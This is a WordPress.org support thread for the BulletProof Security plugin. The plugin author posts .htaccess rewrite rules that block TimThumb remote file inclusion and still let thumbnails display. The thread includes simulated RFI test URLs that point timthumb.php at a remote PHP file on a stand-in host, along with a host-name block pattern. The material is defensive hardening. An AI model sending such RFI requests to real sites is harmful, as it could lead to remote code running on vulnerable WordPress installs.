WordPress.org
BulletProof Security
[resolved] Images disappeared (6 posts)

  1. agslk
    Member
    Posted 2 years ago #

    - WordPress : 3.3.1
    - PHP/MySQL : PHP 5 / MySQL 5
    - Theme : London Live
    - Url : http://www.leforumdessports.fr/blog/

    Hi,

    All images are missing after BPS installation.

    Can someone help me, because I don't know what I need to change in the .htaccess file.

    Thank you.

    http://wordpress.org/extend/plugins/bulletproof-security/

  2. agslk
    Member
    Posted 2 years ago #

    OK it is fixed.

  3. AITpro
    Member
    Plugin Author

    Posted 2 years ago #

    At some point I will change the .htaccess thumbnailer script default forbid rule to another set of .htaccess rules that will not block / forbid thumbnailer scripts by default. I need to ponder how to allow this without creating a "constant" that can be used as an exploit.

    I think it should be a rule using this general idea.

    # sketch only: the first group stands for a pattern that actually identifies a hacking attempt
    RewriteCond %{REQUEST_FILENAME} (an actual real identifier in a hacking attempt).*(timthumb\.php|thumb\.php|thumbs\.php|phpthumb\.php) [NC]
    RewriteRule . - [F,L]
    

    My original goal of getting awareness up about this vulnerability has been achieved, so I can now create such a rule. ;)

  4. AITpro
    Member
    Plugin Author

    Posted 2 years ago #

    This will be the official new TimThumb RFI .htaccess code in BPS .46.8;
    if you want to use it now, be my guest. ;)

    Test Results:

    Thumbnail image direct file request - 200
    - Images are displayed both in pages and when viewing individual image files
    http://www.example.com/wordpress-testing-website/wp-content/themes/bigfoot/includes/timthumb.php?src=http://www.ait-pro.com/wordpress-testing-website/wp-content/uploads/2010/02/6t3fko.jpg&h=48&w=48&zc=1

    Results in a 404 - host name "booger" is not forbidden
    http://www.example.com/wordpress-testing-website/timthumb.php?src=http://booger.com.hostdail.com/fart.php

    Simulated RFI Hacking Attempt by Host that is Not Forbidden
    http://www.example.com/wordpress-testing-website/wp-content/themes/bigfoot/includes/timthumb.php?src=http://booger.com.hostdail.com/fart.php

    Results:
    TimThumb version 1.19
    With Allow External Sites = True
    error reading file http://booger.com.hostdail.com/fart.php from remote host: Couldn't resolve host 'booger.com.hostdail.com'
    Query String : src=http://booger.com.hostdail.com/fart.php
    TimThumb version : 1.19

    Timthumb version 2.8
    with Allow External Sites = True
    The following error(s) occured:
    Error reading the URL you specified from remote host.Couldn't resolve host 'booger.com.hostdail.com'
    Query String : src=http://booger.com.hostdail.com/fart.php
    TimThumb version : 2.8

    Simulated RFI Hacking Attempt by Host that is Forbidden
    Results:
    TimThumb version 1.19 and 2.8
    Results in 403 and an additional 500 error - host name "picasa" is forbidden
    http://www.example.com/wordpress-testing-website/wp-content/themes/bigfoot/includes/timthumb.php?src=http://picasa.com.hostdail.com/fart.php

    The New .htaccess Code:

    # PLUGINS AND VARIOUS EXPLOIT FILTER SKIP RULES
    # IMPORTANT!!! If you add or remove a skip rule you must change S= to the new skip number
    # Example: If RewriteRule S=5 is deleted than change S=6 to S=5, S=7 to S=6, etc.
    # Adminer MySQL management tool data populate
    RewriteCond %{REQUEST_URI} ^/wp-content/plugins/adminer/ [NC]
    RewriteRule . - [S=12]
    # Comment Spam Pack MU Plugin - CAPTCHA images not displaying
    RewriteCond %{REQUEST_URI} ^/wp-content/mu-plugins/custom-anti-spam/ [NC]
    RewriteRule . - [S=11]
    # Peters Custom Anti-Spam display CAPTCHA Image
    RewriteCond %{REQUEST_URI} ^/wp-content/plugins/peters-custom-anti-spam-image/ [NC]
    RewriteRule . - [S=10]
    # Status Updater plugin fb connect
    RewriteCond %{REQUEST_URI} ^/wp-content/plugins/fb-status-updater/ [NC]
    RewriteRule . - [S=9]
    # Stream Video Player - Adding FLV Videos Blocked
    RewriteCond %{REQUEST_URI} ^/wp-content/plugins/stream-video-player/ [NC]
    RewriteRule . - [S=8]
    # XCloner 404 or 403 error when updating settings
    RewriteCond %{REQUEST_URI} ^/wp-content/plugins/xcloner-backup-and-restore/ [NC]
    RewriteRule . - [S=7]
    # BuddyPress Logout Redirect
    RewriteCond %{QUERY_STRING} action=logout&redirect_to=http%3A%2F%2F(.*) [NC]
    RewriteRule . - [S=6]
    # redirect_to=
    RewriteCond %{QUERY_STRING} redirect_to=(.*) [NC]
    RewriteRule . - [S=5]
    # Login Plugins Password Reset And Redirect 1
    RewriteCond %{QUERY_STRING} action=resetpass&key=(.*) [NC]
    RewriteRule . - [S=4]
    # Login Plugins Password Reset And Redirect 2
    RewriteCond %{QUERY_STRING} action=rp&key=(.*) [NC]
    RewriteRule . - [S=3]
    
    # TimThumb Forbid RFI By Host Name But Allow Internal Requests
    RewriteCond %{QUERY_STRING} ^.*(http|https|ftp)(%3A|:)(%2F|/)(%2F|/)(w){0,3}.?(blogger|picasa|blogspot|tsunami|petapolitik|photobucket|imgur|imageshack|wordpress\.com|img\.youtube|tinypic\.com|upload\.wikimedia|kkc|start-thegame).*$ [NC,OR]
    RewriteCond %{THE_REQUEST} ^.*(http|https|ftp)(%3A|:)(%2F|/)(%2F|/)(w){0,3}.?(blogger|picasa|blogspot|tsunami|petapolitik|photobucket|imgur|imageshack|wordpress\.com|img\.youtube|tinypic\.com|upload\.wikimedia|kkc|start-thegame).*$ [NC]
    RewriteRule .* index.php [F,L]
    RewriteCond %{REQUEST_URI} (timthumb\.php|phpthumb\.php|thumb\.php|thumbs\.php) [NC]
    RewriteRule . - [S=1]

  5. agslk
    Member
    Posted 2 years ago #

    I put your code.
    It seems to be ok.
    Thank you very much :o)

  6. AITpro
    Member
    Plugin Author

    Posted 2 years ago #

    Cool. thanks for the feedback. :)

    I'll be releasing BPS .46.8 probably around 1-18-2012 so I'll add this new TimThumb .htaccess code to AutoMagic in that release.

    And I made a typo in this example 200 test:
    both domain names would be the same (example.com) in a direct request, as opposed to a remote request. ;)

    Thumbnail image direct file request - 200
    - Images are displayed both in pages and when viewing individual image files
    http://www.example.com/wordpress-testing-website/wp-content/themes/bigfoot/includes/timthumb.php?src=http://www.example.com/wordpress-testing-website/wp-content/uploads/2010/02/6t3fko.jpg&h=48&w=48&zc=1
